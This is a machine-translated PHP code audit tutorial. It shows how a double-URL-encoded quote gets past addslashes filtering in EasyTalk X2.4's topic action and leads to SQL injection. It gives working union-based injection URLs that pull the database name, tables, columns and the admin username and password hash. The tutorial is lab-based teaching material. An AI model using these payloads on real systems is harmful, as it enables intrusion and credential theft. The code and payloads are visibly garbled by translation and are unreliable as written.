[PHP code audit instance tutorial] SQL injection-2. global protection Bypass UrlDecode-php Tutorial

[PHP code audit instance tutorial] SQL injection-2. global protection Bypass UrlDecode 0x01 background

Currently, WEB programs basically have global filtering for SQL injection, such as enabling GPC in PHP or common in global files. use the addslashes () function on php to filter the received parameters, especially single quotes. In this case, we need to find some encoding and decoding functions to bypass global protection. This article describes the situation of urldecode ~

Vulnerability comes from Wooyun: http://www.wooyun.org/bugs/wooyun-2014-050338

0x02 environment setup

Check the background. We use the easytalk program of a lower version. the version is X2.4.

I packed a copy of the source code: http://pan.baidu.com/s/1bopOFNL

② Decompress the package to the easytalk directory of www and follow the prompts to install it step by step. if you encounter any problems, click baidu or google. after successful access, visit:

0x03 vulnerability analysis

First, let's take a look at the source code structure. the ThinkPHP framework is complicated:

If you are interested, you can study it and continue to look at it. new users can know that ThinkPHP filters the received parameters, and will perform corresponding processing based on whether your server enables GPC:

1. line 3 of the/ThinkPHP/Extend/Library/ORG/Util/Input. class. php file:

/** + ---------------------------------------------------------- * If magic_quotes_gpc is disabled, this function can escape the string + handler * @ access public + handler * @ param string $ string the string to be processed + handler * @ return string + -------------------------------------------------- -------- */Static public function addSlashes ($ string) {if (! Get_magic_quotes_gpc () {$ string = addslashes ($ string);} return $ string ;}

2. use the global search function of the Seay code audit system to search for files with the keyword "urldecode". TopicAction is found. class. php contains a URL for urldecode of the received parameter keyword and SQL query:

3. follow up on this php file and perform urldecode transcoding for it when receiving the keyword, and then immediately bring it into the query, resulting in injection:

Public function topic () {$ keyword = $ this-> _ get ('keyword', 'urldecode '); // use the _ get provided by the ThinkPHP framework to urldecode the received keyword parameters (for details, see http://doc.thinkphp1.cn/manual/get_system_var.html ) If ($ keyword) {$ topic = D ('topic ')-> where ("topicname =' $ keyword'")-> find (); // OK, if ($ topic) {$ isfollow = D ('mytopic ')-> isfollow ($ topic ['id'], $ this-> my ['User _ id']); $ topicusers = D ('mytopicview')-> where ("topicid = '$ topic [id]'") -> order ('Id desc')-> limit (9)-> select (); // getwidget $ widget = M ('topicwidget ') -> where ("topicid = '$ topic [id]'")-> order ('Order 'asc ')-> select (); if ($ widget) {foreach ($ widge T as $ val) {$ topicwidget [$ val ['widgettype'] [] = $ val ;}$ this-> assign ('topicwidget ', $ topicwidget );} else {$ count = $ isfollow = 0;} $ this-> assign ('comefrom', 'topic '); $ this-> assign ('keyword', $ keyword ); $ this-> assign ('topic ', $ topic); $ this-> assign ('topicusers', $ topicusers); $ this-> assign ('isfollow ', $ isfollow); $ this-> assign ('subname ','#'. $ keyword. '#'); $ this-> display ();} else {header ("location :". SITE_URL .'/? M = topic & a = index ');}}

0x04 proof of vulnerability

1. we construct a POC for getting database information:

Http: // localhost/eazytalk /? M = topic & a = topic & keyword = aaa % 2527 and 1 = 2 union select 1, 2, 3, concat (database (), 0x5c, user (), 0x5c, version (), 5% 23

The information obtained successfully is as follows:

Check the MySql log and find that the SQL statement is successfully executed:

2. we construct the POC for getting all the tables in the database eazytalk:

Http: // localhost/eazytalk /? M = topic & a = topic & keyword = aaa % 2527 and 1 = 2 union select 1, 2, 3, (select GROUP_CONCAT (DISTINCT table_name) from information_schema.tables where table_schema = 0x6561721374616c6b)

The following table information is obtained successfully:

4. construct the POC for obtaining information about all fields in the et_users table:

Http: // localhost/eazytalk /? M = topic & a = topic & keyword = aaa % 2527 and 1 = 2 union select 5%, 3, (select GROUP_CONCAT (DISTINCT column_name) from information_schema.columns where table_name = 0x65745F7573657273), 23

All fields in the et_users table are obtained as follows:

5. construct the POC for getting the first account in the et_users table:

Http: // localhost/eazytalk /? M = topic & a = topic & keyword = aaa % 2527 and 1 = 2 union select 1, 2, 3, (select GROUP_CONCAT (DISTINCT user_name, 0x5f, password) from et_users limit 0, 1 ), 5% 23

The admin account password is successfully obtained as follows:

Original article address:

Http://www.cnbraid.com/2015/12/24/sql1/